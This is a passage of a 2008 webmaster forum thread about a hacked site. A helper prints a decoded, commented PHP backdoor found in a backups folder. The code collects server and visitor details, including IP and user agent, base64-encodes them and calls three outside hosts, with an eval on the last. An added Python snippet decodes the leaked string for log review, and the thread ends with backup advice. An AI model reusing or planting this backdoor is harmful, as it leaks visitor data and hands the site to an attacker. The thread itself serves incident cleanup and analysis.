
Site getting Hacked


22 replies to this topic

#21 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 03 November 2008, 20:25

germ, on Oct 28 2008, 07:48 PM, said:

Both of the files you posted about in the backups folder are bad. Delete them.
Can you tell me what that particular script does? I can't make sense of it, but then, I am not a coder.
Jim

#22 germ

  • Community Member
  • 13,471 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 03 November 2008, 22:07

I can't tell you what it does because the main payload(s) rely on something from another server.

All I can do is make it easier to read (reformatted, decoded, commented, and simplified as much as possible):

<? error_reporting(0);
$s="e";
// get info about this site/page/server
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// encode it
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ("http://a.rsdcraft.ws/?".$str);
else if ("http://ad.runweb.info/?".$str);
else eval("http://7.xmldata.info/?".$str);
?>

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help

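To see what the script above actually leaks, the dotted string it builds can be taken apart field by field. This is an added example, not code from the forum post or from the decoded script: it assumes the field order shown in the decoded script (eight base64 fields, the literal "e" marker, then two more), uses the three callback hosts named there, and all sample values are constructed.

```python
import base64
import binascii
from urllib.parse import urlsplit

# Field order as read from the decoded script: eight base64 fields, the
# literal "e" marker ($s), then two more base64 fields, all joined with ".".
FIELDS = ["HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF",
          "QUERY_STRING", "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR",
          "SCRIPT_FILENAME", "HTTP_ACCEPT_LANGUAGE"]
MARKER_INDEX = 8  # where the literal "e" sits in the dotted string

# Callback hosts named in the decoded script (indicators for egress/proxy logs).
CALLBACK_HOSTS = {"a.rsdcraft.ws", "ad.runweb.info", "7.xmldata.info"}


def encode_beacon(values, marker="e"):
    """Rebuild the dotted string the way the script does (used to make test input)."""
    parts = [base64.b64encode(v.encode()).decode() for v in values]
    parts.insert(MARKER_INDEX, marker)
    return ".".join(parts)


def decode_beacon(query):
    """Return a dict of the leaked $_SERVER fields, or None if the string
    does not match the script's layout. Splitting on "." is safe because
    "." is not in the base64 alphabet."""
    parts = query.split(".")
    if len(parts) != len(FIELDS) + 1 or parts[MARKER_INDEX] != "e":
        return None
    encoded = parts[:MARKER_INDEX] + parts[MARKER_INDEX + 1:]
    out = {}
    for name, blob in zip(FIELDS, encoded):
        if blob == "":          # unset $_SERVER variable encodes to nothing
            out[name] = ""
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            return None
        out[name] = raw.decode("utf-8", "replace")
    return out


def inspect_outbound_url(url):
    """For an outbound request seen in egress/proxy logs, report whether it
    targets one of the script's callback hosts and, if so, what it leaked."""
    u = urlsplit(url)
    if u.hostname not in CALLBACK_HOSTS:
        return None
    return decode_beacon(u.query)
```

Running decode_beacon on a captured query string shows exactly which host, path, visitor IP and user agent the backdoor reported, which is useful when deciding what to tell affected customers.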

#23 php_Guy

  • Community Member
  • 179 posts
  • Real Name:Some Guy
  • Gender:Male
  • Location:Corvallis, OR

Posted 03 November 2008, 22:37

germ, on Oct 28 2008, 05:57 PM, said:

Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard.
No, no... I would not delete and reinstall. It would be easier to manually inspect every file in every folder.

I was suggesting that he delete everything and re-install his last backup. And preferably, that backup should be a set of working files that have never actually resided on the webspace.

IMO, everyone should modify files locally and then upload them to their server and occasionally make a copy of those local files and set them aside as a snapshot just for this sort of thing. That way, you can delete the entire site and reload a current set of files. It should take less than half an hour even on a slow connection.

Unfortunately, some people modify the files live on the server and don't have local files. Those that do back up (i.e. download a full set of files from the server) have a backup of files that could have been infected.